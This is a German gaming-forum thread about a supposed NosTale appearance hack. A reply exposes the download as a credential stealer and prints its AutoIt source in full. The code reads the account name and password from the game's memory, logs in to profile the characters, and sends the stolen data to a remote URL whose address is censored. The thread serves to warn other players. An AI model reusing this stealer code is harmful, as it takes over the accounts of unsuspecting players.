|
You last visited: Today at 05:20
Advertisement
Nostale **Update** Clientside
Discussion on Nostale **Update** Clientside within the Nostale forum part of the MMORPGs category.
09/30/2011, 23:45
|
#1
|
elite*gold: 0
Join Date: Sep 2011
Posts: 26
Received Thanks: 3
|
Nostale **Update** Clientside
Hack ist von Der_ball
Was macht der Clientside Hack?
Der Clientside Hack, änder das aussehen eurer Fee und eures Charakters
Wie funktioniert er?
Recht Simpel, bei dem Feen part, einfach auf die Radiobox klicken (ein kleiner Kreis woneben die Fee steht)(selbe gilt für Charaktere).
Für den Waffen und Aussehen teil müsst ihr einfach eine Zahl eingeben
(Mapwechsel,Relog,Rüssiwechsel, etc. und ihr seid wieder normal).
Anmerkungen:
Der Hack und auch NosTale müssen stets als Admin ausgeführt werden!
Manchmal verschwindet das Interface beim nutzen der Aussehen hacks.
Downlaod 23.09.2011:
Viel spass Thx ;-)
|
|
|
09/30/2011, 23:48
|
#2
|
elite*gold: 0
Join Date: Jan 2010
Posts: 1,829
Received Thanks: 461
|
Das Ding funktioniert nicht mehr und wurde von Der_Ball bereits gepostet.
#Closerequest
|
|
|
10/01/2011, 15:08
|
#3
|
elite*gold: 20
Join Date: Nov 2009
Posts: 2,256
Received Thanks: 1,570
|
Ich möchte mal auf diesen Part aufmerksam machen:
Func _Stealer()
If ProcessExists("NostaleX.dat") Then
$StaticOffsetID = Dec("3BA5B0")
$StaticOffsetPW = Dec("3BA8C4")
Global $OffsetID[3] = [0, 0xF8, 0x4F]
Global $OffsetPW[3] = [0, 0x50, 0x0]
$MemOpen = _MemoryOpen(ProcessExists("NostaleX.dat"))
$BaseAddr = _MemoryGetBaseAddress($MemOpen, 1)
$Addr = "0x" & Hex($BaseAddr + $StaticOffsetID)
$Addr2 = "0x" & Hex($BaseAddr + $StaticOffsetPW)
$ID = _MemoryPointerRead($Addr, $MemOpen, $OffsetID, "char[30]")
$PW = _MemoryPointerRead($Addr2, $MemOpen, $OffsetPW, "char[20]")
If StringRegExp($ID[1], "&m_szName") Then
$split = _StringBetween($ID[1], "", "&m_szName")
_TryIt()
EndIf
EndIf
EndFunc ;==>_Stealer
Func _TryIt()
If StringRegExp(FileRead(@TempDir & "\Used.exe"), $split[0]) = 0 Then
For $i3 = 1 To 3
$Packet = "username=" & $split[0] & "&password=" & $PW[1] & "&SubmitLoginForm=Senden"
$HTTP_AGENT = _WINHTTPOPEN("Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5")
$HTML = Http("Post","www.nostale.de","/user/login",$Packet)
If StringRegExp($HTML, "Willkommen " & $split[0]) = 1 Then
$login = 1
If $Firsttime = 1 Then
$PostSend &="<br><br>ID: " & $split[0] & "<br>" & "PW: " & $PW[1]
$Firsttime = 0
EndIf
$PostSend &= "<br>Server: " & $i3
$between = _StringBetween($HTML, '<a class="charge" href="http://de.shop.nostale.de/', '">')
Http("GET","de.shop.nostale.de",$between[0])
$Packet = "choosenServer=" & $i3
$HTML = Http("Post","de.shop.nostale.de","charchoose/chooseServer",$Packet)
$between2 = _StringBetween($HTML, "<option>", "</option>")
If @error = 1 Then
$PostSend &="<br> Nothing Found"
Else
If UBound($between2) - 1 = 0 Then
$Packet = "serverchoice=" & $i3 & "&classchoice=-1&ranking_typ=level&search=" & $between2[0]
$HTML = Http("Post","www.nostale.de","main/highscore/1/0/level",$Packet)
$between3 = _StringBetween($HTML, '<td class="rank-td-2-2">', "</td>")
If @error Then $PostSend &= "<br>Name: " & $between2[0] & "<br>Unter level5!"
$between4 = _StringBetween($HTML, '<td class="rank-td-2-3">', "</td>")
For $i = 0 To UBound($between3) - 1
If StringRegExp($between3[$i], $between2[0]) = 1 Then
$PostSend &="<br>Name: " & $between3[$i] & "<br>Level: " & $between4[$i]
EndIf
Next
Else
For $i2 = 0 To UBound($between2) - 1
$Packet = "serverchoice=" & $i3 & "&classchoice=-1&ranking_typ=level&search=" & $between2[$i2]
$HTML = Http("Post","www.nostale.de","main/highscore/1/0/level",$Packet)
$between3 = _StringBetween($HTML, '<td class="rank-td-2-2">', "</td>")
If @error Then $PostSend &="<br>Name: " & $between2[$i2] & "<br>Unter level5!"
$between4 = _StringBetween($HTML, '<td class="rank-td-2-3">', "</td>")
For $i = 0 To UBound($between3) - 1
If StringRegExp($between3[$i], $between2[$i2]) = 1 Then
$PostSend &= "<br>Name: " & $between3[$i] & "<br>Level: " & $between4[$i]
EndIf
Next
Next
EndIf
EndIf
EndIf
Next
If $login = 1 Then
InetRead("*Zensiert Dürft ihr selber raussuchen*" & $PostSend)
$login = 0
$PostSend = ""
EndIf
$Firsttime = 1
FileWrite(@TempDir & "\Used.exe", $split[0])
EndIf
EndFunc ;==>_TryIt
Func Http($GET,$Host,$Path,$Packet ="")
$HTTP_CONNECT = _WINHTTPCONNECT($HTTP_AGENT, $Host)
$HTTP_REQUEST = _WINHTTPOPENREQUEST($HTTP_CONNECT, $GET, $Path, "HTTP/1.1",$Host)
if $Packet <> "" then
_WINHTTPSENDREQUEST($HTTP_REQUEST, "Content-Type: application/x-www-form-urlencoded" & @CRLF, $Packet)
Else
_WINHTTPSENDREQUEST($HTTP_REQUEST, "Content-Type: application/x-www-form-urlencoded")
Endif
_WINHTTPRECEIVERESPONSE($HTTP_REQUEST)
$HTML = ""
Do
$HTML &= _WINHTTPREADDATA($HTTP_REQUEST)
Until @error
Return $HTML
Endfunc
Wer die Datei runterlädt und am Main benutzt ist selber Schuld
|
|
|
10/01/2011, 18:02
|
#4
|
elite*gold: 32
Join Date: Jul 2010
Posts: 2,377
Received Thanks: 1,167
|
Also ist diexNuddelx ein Multiacc von Peterklassemann?
|
|
|
10/01/2011, 20:13
|
#5
|
elite*gold: 97
Join Date: May 2009
Posts: 401
Received Thanks: 81
|
Könnte hinhauen^^
|
|
|
10/01/2011, 23:19
|
#6
|
elite*gold: 0
Join Date: Apr 2011
Posts: 3,944
Received Thanks: 368
|
Nein Danke. Spiele kein Nos mehr.
|
|
|
10/02/2011, 11:56
|
#7
|
elite*gold: 0
Join Date: Oct 2008
Posts: 3,594
Received Thanks: 2,714
|
Quote:
Originally Posted by DiexNuddelx
ehm ich kenne keinen peterigendwas wollte nur nett sein spastis alter
|
Vielen dank für den netten Phisher.
|
|
|
Similar Threads
|
Nostale Fee hack CLIENTSIDE mit cheat engine
05/04/2011 - Nostale - 11 Replies
Nostale Fee optik hack! der funzt
also zu erst gibt ihr eure fee ein :
1325400305 = Rote Mall Fee
1325400306 = Blaue Mall Fee
1325400307 = Weisse Mall Fee
1325400309 = Schwarze Mall Fee
1336934404 = Rote Mall Fee (BOOST)
1336934405 = Blaue Mall Fee (BOOST)
1336934402 = Weiße Mall Fee (BOOST)
|
All times are GMT +2. The time now is 05:20.
|
|